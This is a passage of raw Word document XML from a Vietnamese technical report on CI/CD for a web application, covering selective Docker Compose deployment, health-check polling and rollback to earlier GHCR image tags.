        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>inlaneweb-db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> từ GitHub Container Registry (GHCR) và kích hoạt. Phương án này tối ưu hóa 100% tài nguyên CPU và RAM cho ứng dụng web.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương án 1B — Triển khai toàn diện cả ứng dụng và cụm giám sát:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nạp bổ sung tệp điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>docker-compose.monitoring.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, khởi chạy song song toàn bộ cụm Loki 3.0, Promtail 3.0, Grafana 11.0 và tác tử giám sát Autoheal, kích hoạt đầy đủ năng lực quan sát nhật ký và tự phục hồi ngay từ thời điểm khởi tạo ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.2. Kịch bản 2: Tự động triển khai phiên bản mới</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bối cảnh bài toán:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chu kỳ phát hành tính năng định kỳ từ môi trường phát triển lên Production khi hoàn thành một mốc phiên bản hoặc bản vá nóng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chu trình vận hành 5 giai đoạn khép kín:</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sz w:val="26"/>
        </w:rPr>
        <w:t>Kiểm soát tại nhánh tích hợp:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Các tính năng được merge vào nhánh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau khi vượt qua Stage 1 Policy Guard và Stage 2 SonarQube kết hợp Semgrep.</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sz w:val="26"/>
        </w:rPr>
        <w:t>Mở Pull Request phát hành chính thức:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trưởng nhóm tạo Pull Request từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> với tiêu đề tuân thủ nghiêm ngặt biểu thức chính quy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>release: vX.Y.Z - &lt;mô tả&gt;</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sz w:val="26"/>
        </w:rPr>
        <w:t>Tiền thẩm định môi trường tạm thời tại Stage 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> GitHub Actions Runner kích hoạt bộ kiểm thử 21 trường hợp trong kiểm định cấu hình tự động, dựng môi trường thử nghiệm tạm thời (Ephemeral Stack), xác thực endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trả về HTTP 200 và Loki </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/ready</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, sau đó đóng gói hình ảnh bất biến gán nhãn commit SHA và đẩy lên GHCR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kích hoạt chuyển giao liên tục tại Stage 4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khi Pull Request được hợp nhất vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, sự kiện push kích hoạt runner thiết lập phiên SSH Ed25519 tới máy chủ VPS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cập nhật không làm gián đoạn dịch vụ (Zero-Downtime Rollout):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kéo hình ảnh mới nhất từ GHCR và thực thi tái tạo container:</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INLANEWEB_IMAGE=ghcr.io/wtfwhoyouare/inlaneweb:&lt;sha&gt; \</w:t>
              <w:br/>
              <w:t xml:space="preserve">     INLANEWEB_DB_IMAGE=ghcr.io/wtfwhoyouare/inlaneweb-db:&lt;sha&gt; \</w:t>
              <w:br/>
              <w:t xml:space="preserve">     docker compose -f docker-compose.prod.yml up -d --remove-orphans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Toàn bộ tiến trình diễn ra dưới 15 giây, dịch vụ chuyển tiếp lưu lượng liền mạch mà không làm rớt kết nối của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.3. Kịch bản 3: Triển khai chọn lọc theo dịch vụ thay đổi (Selective &amp; Decoupled Deployment)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bối cảnh bài toán:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tối ưu hóa tài nguyên máy chủ và loại bỏ điểm mù giám sát khi các thay đổi biệt lập chỉ thuộc về hạ tầng giám sát hoặc chỉ thuộc về nghiệp vụ web và database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế phân luồng thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Thông qua lệnh so sánh sai khác tệp tin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>git diff --name-only HEAD~1 HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, đường ống phân tích phạm vi thay đổi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhánh thay đổi giám sát thuần túy (`InlaneWeb/monitoring/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">):** Đường ống bỏ qua hoàn toàn Job 2 tải làm việc web, chỉ kích hoạt Job 1 thực thi cập nhật khối giám sát qua lệnh </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>docker compose -f docker-compose.monitoring.yml up -d --remove-orphans`. Vùng chứa web và database hoàn toàn không bị tác động, người dùng không nhận biết được sự thay đổi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nhánh thay đổi mã nguồn nghiệp vụ (`InlaneWeb/web/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>InlaneWeb/db/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>`):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đường ống bỏ qua Job 1, chỉ kích hoạt Job 2. Khối hạ tầng quan sát Loki và Promtail hoạt động liên tục 24/7, ghi nhận trọn vẹn toàn bộ các sự kiện khởi động lại của container web mà không để xảy ra bất kỳ điểm mù giám sát nào (Zero Blind-spot Logging).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.4. Kịch bản 4: Xử lý độ trễ khởi động của cơ sở dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bối cảnh bài toán:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trong các phiên bản phát hành lớn có nạp các script cập nhật cấu trúc bảng dữ liệu, hoặc khi MariaDB cần thời gian khởi tạo vùng đệm bộ nhớ (InnoDB Buffer Pool), container database sẽ cần từ 10 đến 30 giây để sẵn sàng tiếp nhận kết nối. Nếu container web khởi động đồng thời, các truy vấn đầu tiên sẽ gặp lỗi từ chối kết nối khiến endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trả về mã lỗi HTTP 503.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế xử lý lỗi chủ động:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kịch bản CI/CD không vội vã đánh giá thất bại mà kích hoạt thuật toán thăm dò thích ứng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tình trạng} = Probe}(URL} = http://127.0.0.1:8088/health},    Δ t = 3s},    N_{max} = 30)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Runner duy trì vòng lặp kiểm tra trạng thái sức khỏe định kỳ mỗi 3 giây, cho phép chờ đợi tối đa lên tới 90 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khi cơ sở dữ liệu hoàn tất việc nạp dữ liệu và phản hồi bình thường, endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trả về mã HTTP 200, quy trình lập tức xác nhận thành công mà không cần chờ hết chu kỳ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu vượt quá ngưỡng 30 chu kỳ mà hệ thống vẫn không phản hồi, cơ chế chẩn đoán sự cố tự động được kích hoạt, trích xuất 50 dòng log cuối cùng của cả hai container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hiển thị trực tiếp lên bảng điều khiển GitHub Actions để kỹ sư lập tức điều tra nguyên nhân.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1.4.5. Kịch bản 5: Khôi phục phiên bản cũ khi gặp sự cố (Disaster Recovery &amp; Instant Rollback)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bối cảnh bài toán:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đảm bảo khả năng phục hồi của hệ thống khi phiên bản vừa phát hành phát sinh lỗi logic nghiêm trọng, rò rỉ dữ liệu hoặc suy giảm hiệu năng ngoài dự kiến trong môi trường thực tế.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy trình đảo ngược trạng thái qua 2 phương án:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phương án 5A — Khôi phục tức thời mức hạ tầng qua SSH:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nhờ cơ chế đóng gói ảnh bất biến có gắn thẻ băm commit SHA trên GHCR, kỹ sư vận hành có thể đảo ngược phiên bản đang chạy về phiên bản ổn định liền trước chỉ trong vòng dưới 10 giây thông qua một câu lệnh duy nhất trên máy chủ VPS:</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cd /opt/inlaneweb</w:t>
              <w:br/>
              <w:t xml:space="preserve">     INLANEWEB_IMAGE=ghcr.io/wtfwhoyouare/inlaneweb:&lt;sha_on_dinh&gt; \</w:t>
              <w:br/>
              <w:t xml:space="preserve">     INLANEWEB_DB_IMAGE=ghcr.io/wtfwhoyouare/inlaneweb-db:&lt;sha_on_dinh&gt; \</w:t>
              <w:br/>
              <w:t xml:space="preserve">     docker compose -f docker-compose.prod.yml up -d --remove-orphans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
